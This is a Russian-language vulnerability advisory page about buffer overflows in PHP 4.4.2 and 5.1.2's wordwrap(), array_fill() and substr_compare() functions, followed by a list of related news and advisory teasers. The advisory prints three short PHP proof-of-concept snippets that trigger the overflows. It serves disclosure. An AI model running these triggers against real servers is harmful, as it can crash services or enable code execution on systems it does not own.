Выполнение произвольного кода и отказ в обслуживании в PHP

Программа:
PHP 4.4.2
PHP 5.1.2 .
Опасность: Высокая

Наличие эксплоита: Да

Описание:
Удаленный пользователь может вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.

Переполнение буфера обнаружено в функциях wordwrap(),array_fill() и substr_compare(). Удаленный пользователь, контролирующий входные параметры функций, может вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.
Примеры:

<?
$a = str_repeat ("A",438013);
$b = str_repeat ("B",951140);
wordwrap ($a,0,$b,0);
?>
<?array_fill  (1,123456789,"Infigo-IS");?>
<?substr_compare ("A","A",12345678);?>


URL производителя: http://www.php.net

Решение: Способов устранения уязвимости не существует в настоящее время.

Поделиться в соц. сетях

mailru Выполнение произвольного кода и отказ в обслуживании в PHP
facebook Выполнение произвольного кода и отказ в обслуживании в PHP
odnoklassniki Выполнение произвольного кода и отказ в обслуживании в PHP
livejournal Выполнение произвольного кода и отказ в обслуживании в PHP
googlebuzz Выполнение произвольного кода и отказ в обслуживании в PHP

Также рекомендуем:

  1. Новый релиз PHP 5.2 Команда разработчиков PHP объявила о выпуске нового релиза PHP 5.2. Этот выпуск является ключевым в линейке версий PHP 5.X, так как включает большое количество новых особенностей, устраненных ошибок и решенных проблем безопасности.. Ключевые изменения в PHP 5.2: Новый менеджер памяти для Двигателя Зенда с улучшенной работой и более точным прослеживанием использования памяти; Расширение входного фильтра [...]...
  2. Релиз PHP 5.2.2 и 4.4.7, обзор 16 новых проблем безопасности В очередной раз в новом релизе PHP 5.2.2 исправлено более 10 ошибок связанных с безопасностью.. Исправления проблем общих для PHP 5.2.2 и 4.4.7: Целочисленное переполнение в функциях createwbmp и readwbmp библиотеки GD, позволяет запустить код через подстановку специально скомпонованных значений в поля размеров Wireless Bitmap (WBMP) изображений; ASCIIZ байт (\0) воспринимался функцией mail() как конец [...]...
  3. Отказ в обслуживании в Microsoft Internet Explorer Программа: Microsoft Internet Explorer 6.x Опасность: Средняя Наличие эксплоита: Да . Описание: Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании. Уязвимость существует в библиотеке mshtml.dll при обработке тега OBJECT. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать отказ в обслуживании браузера. Примеры: http://lcamtuf.coredump.cx/iedie2-1.htmlhttp://lcamtuf.coredump.cx/iedie2-2.htmlhttp://lcamtuf.coredump.cx/iedie2-3.htmlhttp://lcamtuf.coredump.cx/iedie2-4.html URL производителя: www.microsoft.com Решение: Способов устранения уязвимости не существует в [...]...
  4. Allsoft.ru и Dr. Web подарят антивирус за тестирование программы! Интернет-магазин лицензионного программного обеспечения Allsoft.ru (http://allsoft.ru/) и компания Dr. Web объявляют о старте новой акции под названием «Мой антивирус – это Dr. Web» (http://drweb.allsoft.ru/). Акция проходит с 7 по 30 декабря 2006 года. Главный приз – комплексный антивирус Dr. Web для защиты рабочих станций без центра управления и антивирус Dr. Web «Семейная лицензия» (http://solutions.drweb.com/home/).. Для [...]...
  5. Новый язык программирования ForceBasic ForceBasic – представляет собой средство для создания программного обеспечения. Выбирая необходимые библиотеки языка, вы можете строить приложения для выбранной платформы. Компилятор языка ForceBasic позволяет строить машинно-независемый код, который выполняется виртуальной машиной, архитектура байт-кода сконфигурирована так чтобы исполняемый код и виртуальная машина были как можно меньше по объёму, как следствие минимальный размер exe от 3K, размер [...]...
  6. Переполнение буфера и раскрытие данных в MySQL Программа: MySQL 4.1.18, и более ранние версии.MySQL 5.0.20 . Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному авторизованному пользователю получить доступ к важным данным и скомпрометировать уязвимую систему. 1. Уязвимость существует из-за недостаточной обработки данных в команде COM_TABLE_DUMP. Удаленный пользователь может с помощью специально сформированного пакета получить доступ к важным данным на системе (к [...]...
  7. Эксперты посчитали «дырки» в Интернет Группа экспертов, входящая в Web Application Security Consortium (http://www.webappsec.org/) – международную организацию, объединяющую профессионалов в области безопасности Web-приложений, опубликовала статистику проблем безопасности Интернет-сайтов, обнаруженных в 2006 году. При составлении документа использовались результаты работ по анализу безопасности сетей, проведенных компаниями – международными лидерами в вопросах безопасности Web-приложений: Cenzic (Hailstorm), Positive Technologies (XSpider), SPI Dynamics (WebInspect) и [...]...
  8. www.VSEM.ru – идет в каждый дом! Проект VSEM.ru (http://www.vsem.ru/), запущенный компанией Агава (www.agava.ru) меньше года назад, стремительно набирает обороты. На сегодняшний день посещаемость ресурса превышает 250 000 уникальных показов в день.. Cоздатели проекта объясняют рост его популярности тем, что www.VSEM.ru (http://www.vsem.ru/) адресован самой широкой аудитории и не имеет русскоязычных аналогов по удобству и универсальности. Напомним, что проект представляет собой торговую площадку, [...]...
  9. Сисадмины и юзеры вновь стали героями сборника курьезных историй Совместный проект компаний Softline и Mail.Ru – сайт Софт@Mail.Ru (http://soft.mail.ru) анонсировал выпуск книги «Сисадмин и юзверь». Издание представляет собой сборник лучших материалов online-сообщества «Сисадмин тоже человек» (http://sysadmin.mail.ru/), присланных системными администраторами из разных городов России и других стран. Это уже второй опыт проекта Софт@Mail.Ru по выпуску тематического сборника (http://sysadmin.mail.ru/book2.php). Напомним, что первая книга под названием «Бред [...]...
  10. Доступен короткий адрес сайта! Уважаемые посетители, для вашего удобства было решено приобрести короткое доменное имя, которое легко запомнить и так же легко набрать: http://3wdev.ru 3wdev.ru – является алиасом интернет-технологий.ру, но возможно со временем именно этот короткий домен станет основным;)Пользуйтесь на здоровье!...
  11. На Daripodarki.ru появилась специализированная страничка ко Дню Святого Валентина Интернет-магазин Daripodarki.ru (http://www.daripodarki.ru) анонсировал на своем сайте специальную страничку, созданную для удобного и быстрого поиска подарков ко Дню Святого Валентина (http://14.daripodarki.ru/). . По словам сотрудников интернет-магазина, на сегодняшний день в России у большинства молодых людей (и не только) уже сложилась традиция делать друг другу подарки на День Святого Валентина. Поэтому коллектив Daripodarki.ru решил как следует [...]...
  12. Подведены итоги конкурса сисадминских репортажей с празднования Дня Системного Администратора 28-30 июля под Калугой состоялся «Первый Всероссийский Слет Сисадминов» (http://sysadmin.mail.ru/sysadmin_weekend.php). Мероприятие посетили более 350 системных администраторов из 30 городов России.По окончании празднования был проведен конкурс репортажей с празднования Дня Системного Администратора-2006. Путем всеобщего голосования посетителей Софт@Mail.ru были выбраны победители конкурса. . В течение 10 дней все желающие делились своими впечатлениями, восторгами и забавными случаями. Идея [...]...
  13. Множественные уязвимости в Mozilla Firefox Программа: Mozilla Firefox до версии 1.5.0.7. Опасность: Критическая Наличие эксплоита: нет Описание: Обнаруженные уязвимости позволяют злоумышленнику выполнить нападение “человек по середине”, межсайтовый скриптинг, спуфинг и потенциально скомпрометировать систему пользователя. 1. Переполнение буфера в обработке JavaScript регулярных выражений позволяет злоумышленнику выполнить произвольный код на целевой системе. 2. Механизм автообновления использует SSL для безопасного общения. Если пользователь [...]...
  14. Google обещает ускорить Интернет вдвое От компании Google поступило сообщение о том, что ею разрабатывается совершенно новый Интернет-протокол SPDY способный вдвое увеличить скорость загрузки данных. Всеми аналитиками единодушно отмечается, что добиться популярности нового протокола будет нелегкой задачей, поскольку для этого потребуется поддержка браузеров Firefox и Internet Explorer.. Со слов представителей компании Google ими планируется не замена протокола HTTP (Hypertext Transfer [...]...
  15. Завершился XIII конкурс методических разработок и студенческих работ на Exponenta.ru Образовательный математический сайт Exponenta.ru подвел итоги тринадцатого конкурса методических разработок и студенческих работ. Конкурс является ежегодным и проводится более 6 лет. В этом году жюри приняло на конкурс 28 работ преподавателей и студентов со всех уголков страны. . Победителем конкурса методических разработок стала Матвеева Татьяна Анатольевна из Уральского государственного технического университета. Учебник называется «У истоков [...]...

Комментарии запрещены.